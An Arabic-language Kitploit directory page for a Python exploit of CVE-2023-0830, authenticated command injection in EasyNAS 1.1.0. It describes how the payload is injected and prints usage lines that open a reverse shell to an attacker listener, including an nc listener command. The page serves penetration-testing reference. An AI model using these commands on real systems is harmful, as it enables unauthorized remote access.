Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-0830 — استغلال لـ EasyNAS الإصدار 1.1.0. الثغرة المستغلة هي خلل حقن أوامر، والذي يتطلب مصادقة. | Kitploit
أدوات/GitHubGitHub/xbz0n/cve-2023-0830
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubxbz0n/cve-2023-0830

CVE-2023-0830

استغلال لـ EasyNAS الإصدار 1.1.0. الثغرة المستغلة هي خلل حقن أوامر، والذي يتطلب مصادقة.

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-0830: استغلال حقن أوامر نظام التشغيل بعد المصادقة في EasyNAS 1.1.0

هذا النص البرمجي بلغة Python هو أداة استغلال قوية لإصدار EasyNAS 1.1.0 مع وظائف محسّنة، تتضمن مستمعًا مدمجًا. الثغرة المستغلة هي خلل في حقن الأوامر، ويتطلب استغلالها مصادقة.

ينشئ النص البرمجي جلسة مع الخادم الهدف، ثم يرسل طلب تسجيل دخول باستخدام بيانات اعتماد يقدمها المستخدم. بعد المصادقة الناجحة، يُنشئ النص البرمجي حمولة (payload) تؤدي عند تنفيذها إلى فتح اتصال صدفي عكسي (reverse shell) بعنوان IP ومنفذ يحددهما المستخدم. تُرمَّز هذه الحمولة بتشفير URL و Base64 ثم تُحقن في ملف backup.pl على الخادم عبر طلب GET مُصمم بعناية.

CVE: CVE-2023-0830

مؤلف الاستغلال

Ivan Spiridonov (xbz0n) https://xbz0n.sh

الصفحة الرئيسية للمورّد

https://www.easynas.org

الميزات

  • مستمع صدفي عكسي مدمج - لا حاجة لعملية netcat منفصلة
  • كشف تلقائي لعنوان IP الخاص بالمستمع
  • خيار استخدام أنواع مختلفة من الأصداف (bash, sh, python)
  • دعم لكل من HTTP و HTTPS
  • دعم للمستمعات الخارجية

الاستخدام

الاستخدام الأساسي مع المستمع المدمج (موصى به):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin

استخدام مستمع خارجي (شغّل nc -lvnp 4444 أولاً):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444

الخيارات:

root@kitploit:~
--mode {shell,reverse}    Exploitation mode: shell (integrated reverse shell) or reverse (external listener)
--lhost IP_ADDRESS        IP address for the reverse shell listener (auto-detected by default)
--lport PORT              Port for the reverse shell listener (default: 4444)
--protocol {http,https}   Protocol to use (default: https)
--verbose                 Enable verbose output
--shell {bash,sh,python}  Specify the shell type to use with integrated listener (default: bash)

التبعيات

  • Python 3
  • مكتبة Requests

إخلاء مسؤولية

هذا النص البرمجي لأغراض تعليمية ولاختبار الاختراق المصرح به فقط. احرص دائمًا على الحصول على إذن صريح قبل تنفيذ أي اختبارات اختراق ضد شبكة أو نظام.

يرجى استخدامه بمسؤولية.

تنزيل الأداة